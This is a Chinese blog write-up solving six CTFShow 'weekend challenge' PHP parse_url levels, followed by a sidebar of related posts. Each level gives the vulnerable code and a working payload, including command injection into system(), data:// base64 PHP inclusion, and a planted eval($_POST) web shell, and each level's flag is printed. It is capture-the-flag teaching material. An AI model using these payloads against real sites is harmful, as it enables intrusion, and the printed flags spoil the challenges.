CTFShow--周末大挑战parse_url篇Writeup

已于 2023-06-11 13:25:01 修改
阅读量874 收藏 2
点赞数 3
分类专栏: CTF 文章标签: php 开发语言 Web CTFshow 周末大挑战
于 2023-05-15 10:19:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/130670772
版权

CTFShow--周末大挑战详细wp

CTFShow 平台:https://ctf.show/

第一关:

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-10 10:58:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
$data = parse_url($_GET['u']);

eval($data['host']);

Payload:?u=http://system('cd ..;cd ..;cd ..;cat flag_is_here.txt');

在这里插入图片描述
也可以通过POST去执行命令获取,得到flagflag_is_here.txtcat查看一下即可。

?u=http://eval($_POST[a]);

a=system("ls /");

在这里插入图片描述在这里插入图片描述

ctfshow{a0e80fdb-2488-41ec-ab41-3f444485afb6}

第二关:

>  <?php
> 
> /*
> # -*- coding: utf-8 -*-
> # @Author: h1xa
> # @Date:   2023-05-10 09:52:06
> # @Last Modified by:   h1xa
> # @Last Modified time: 2023-05-12 13:25:53
> # @email: h1xa@ctfer.com
> # @link: https://ctfer.com
> 
> */
> 
> $data = parse_url($_GET['u']);
> include $data['host'].$data['path'];

在这里插入图片描述
Payload:

 get:
 ?u=ctfshow://data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b

ctfshow{d855cf94-0ea0-4ae6-9983-25331dae4b3d}

第三关:

在这里插入图片描述

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
$data = parse_url($_GET['u']);
include $data['scheme'].$data['path'];

Payload:

get:?u=data:://test/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=

post:A=tac /_f*

在这里插入图片描述

ctfshow{595cf0e0-350b-4a58-aa16-970b290fd1c9}

第四关:

在这里插入图片描述

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:35
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);

system($data['host']);

Payload:?u=http://cd ..;cd ..;cd ..;tac 1_f1ag_1s*

在这里插入图片描述

ctfshow{644f5bb8-5572-4569-882d-1a5673e01f9b}

第五关:

在这里插入图片描述

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
extract(parse_url($_GET['u']));
include $$$$$$host;

在这里插入图片描述
Payload:

get:
?u=%75%73%65%72%3a%2f%2f%70%61%73%73%3a%71%75%65%72%79%40%73%63%68%65%6d%65%2f%3f%66%72%61%67%6d%65%6e%74%23%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c%50%44%39%77%61%48%41%67%63%33%6c%7a%64%47%56%74%4b%43%52%66%55%45%39%54%56%46%74%42%58%53%6b%37%50%7a%34%3d

post:
A=tac /_f1a*

ctfshow{2c95c0cf-6c53-46ce-bd87-1221067bc07a}

第六关:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

$data = parse_url($_GET['u']);

file_put_contents($data['path'], $data['host']);

在这里插入图片描述
Payload:

get:
?u=http://111<script language="php">eval($_POST[A]);/var/www/html/zzz.php  

post:
A=system("tac /_f1a*");

在这里插入图片描述

ctfshow{ba400845-b41f-4612-8f5a-30fa718db9a1}

在这里插入图片描述

至此本周的周末大挑战全部通过,感谢大家的观看和官网的wp不一样(当时做完了没有及时写 现在补完啦,又是充实的一天😊!)

落寞的魚丶
关注
专栏目录
hive parse_url用法
Top5软件工程硕士,先后在京东、字节从事多年Java后端开发、实时和离线大数据开发
04-13 1716
select parse_url('http://facebook.com/path/p1.php?query=1', 'HOST') -- facebook.com select parse_url('http://facebook.com/path/p1.php?query=1', 'PATH') -- /path/p1.php select parse_url('http://fa...
gorm的parseTime=true报错 Error 1292: Incorrect datetime value: '0000-00-00' for column 'created_at' at
手写我对你的温柔
03-04 5725
我的mysql是8.x版本,mysql以前 datetime 的默认值可以设为 '0000-00-00 00:00:00', 新的mysql不能设为这个值,可以把默认值设置为正常的时间就可以了, 比如 '2020-03-0400:00:00' 或者 去掉sql_model 中的NO_ZERO_DATE配置即可 方式详解:【主要演示常用的方式2】 方式1: 使用se...
ctfshow 每周挑战 RCE极限挑战4、5
Altering_Ji的博客
05-31 1681
ctfshow RCE极限挑战4和5 看过官方wp之后复现的,payload是自己后来写的,可能不如官方的看着清晰,但又很能碎碎念
CTF之Parse_url函数
Elite的博客
05-31 2658
parse_url() 是 PHP 内置函数之一,用于解析 URL 字符串,将其拆分为不同的组成部分,可以获取协议、主机名、端口号、路径、查询参数等信息。
ctfshow每周挑战之RCE极限挑战
zzz6583zz的博客
08-12 425
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
CTFSHOW_周末挑战
m0_59448417的博客
05-14 321
CTFSHOW_周末挑战
ctfshow 周末挑战
m0_64348326的博客
05-15 195
1.file_get_contents将数据写入文件,但是不能使用?号,不然后面的内容都将会被当成GET传的参。添加斜杠会被当成path参数,于是使用路径穿越执行命令或者编码都可以。1.变量覆盖,找到parse_url中没有脏数据和可控的参数。因为是写入路径中,所以path的值会带。1.第二关基础上删除http://,,下面要用绝对路径来写入。,再传参执行命令即可。
ctfshow每周挑战
Innocence_0的博客
02-04 941
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。如下图所示,POST传参时,参数名为code,后台对 “(”、“.” 做了替换。
yum-metadata-parser-1.1.2-16.el6.x86_64.rpm
05-30
yum-metadata-parser-1.1.2-16.el6.x86_64.rpm
使用python args parse_args(),解决error: the following arguments are required: --input/-i, --output/-o
qq_36918538的博客
04-25 1万+
argparse 模块是 Python 内置的一个用于命令项选项与参数解析的模块。 该模块可以让人轻松编写用户友好的命令行接口。通过在程序中定义好我们需要的参数,然后 argparse 将会从 sys.argv 解析出这些参数。argparse 模块还会自动生成帮助和使用手册,并在用户给程序传入无效参数时报出错误信息。 原始代码 parser = argparse.ArgumentParser() parser.add_argument('--input', '-i', required=True, he
scrapy-redis分布式爬虫如何在start_urls中添加参数
热门推荐
Kosmoo的博客
03-27 2万+
scrapy-redis分布式爬虫如何在start_urls中添加参数 1.背景介绍 有这样一个需求,需要爬取A,B,C,D四个链接下的数据,但是每个链接下要爬取的数据量不同: url链接: 指定爬取的商品数 A: 10 B: 20 C: 5 D: 32 首先通过下面的文章了解一下scrapy-redis分布式爬虫的基本框架。 ...
CTFSHOW每周挑战——RCE
qq_61955196的博客
11-21 2951
ctfshow的每周挑战之RCE的解题方法和一些问题的解决方法和个人总结。
ctfshow 每周挑战 RCE极限挑战2
Altering_Ji的博客
05-06 804
ctfshow 每周挑战 RCE极限挑战 第2题 用变量自增的方法解题
ctfshow 每周挑战 RCE极限挑战3
Altering_Ji的博客
05-29 581
ctfshow 每周挑战 RCE极限挑战3 payload有长度限制105,通过变量自增构造出POST,实现RCE
CTFshow周末挑战wp
qq_61955196的博客
05-13 346
本来要看政治的(卑微的周末考期末人),群主突然说有比赛就来玩玩看了。没想到ak了。这里就讲一下我的解题思路。
ctfshow 每周挑战 极限命令运行
2301_81040377的博客
04-24 564
然后进行合理的手段只有01不难想到是二进制,然后我们再转换为刚才的八进制来执行命令。我们的目的是构造命令cat /flag。然后这里我们发现可以取反获得数字0 1。我们都可以直接执行8进制的了。没有通配符了,但是可以通过。是ascii字母的8进制值。现在直接用${##}替换1。先用脚本跑出这些东东能用。然后要找出1就能有答案了。跑完脚本发现这些可以用。的方式执行命令,其中。
Nginx 常用的安全屏蔽规则_nginx拦截规则
2401_84263282的博客
04-28 480
Nginx 是一个高性能的 HTTP 和反向代理服务,目前很大一部分网站均使用了 Nginx 作为 WEB 服务器,Nginx 虽然非常强大,但默认情况下并不能阻挡恶意访问,整理了一份常用的 Nginx 的屏蔽规则,希望对各位站长有所帮助。
parse_url curl
最新发布
09-26
`parse_url` 是 PHP 中的一个内置函数,用于解析 URL 成其组成部分,如协议、主机名、路径等。它返回一个关联数组,包含了 URL 的各个部分信息。例如: ```php $url = 'https://www.example.com/path?query=param#fragment'; $parsedUrl = parse_url($url); print_r($parsedUrl); ``` 这将输出类似这样的结果: ``` Array ( [scheme] => https [host] => www.example.com [path] => /path [query] => query=param [fragment] => fragment ) ``` 而 `curl` 是一个强大的网络传输工具库,在 PHP 中作为扩展存在,它允许我们发送 HTTP 请求(GET、POST 等)、接收响应,并可以处理各种认证、代理设置等功能。使用 `curl` 你可以执行像这样的一段代码: ```php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'https://api.example.com/data'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // 获取并保存服务器响应 $response = curl_exec($ch); curl_close($ch); // 接下来处理 $response 数据 ``` 这里 `curl_setopt()` 函数设置了请求的相关选项,`curl_exec()` 执行请求,最后关闭连接。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值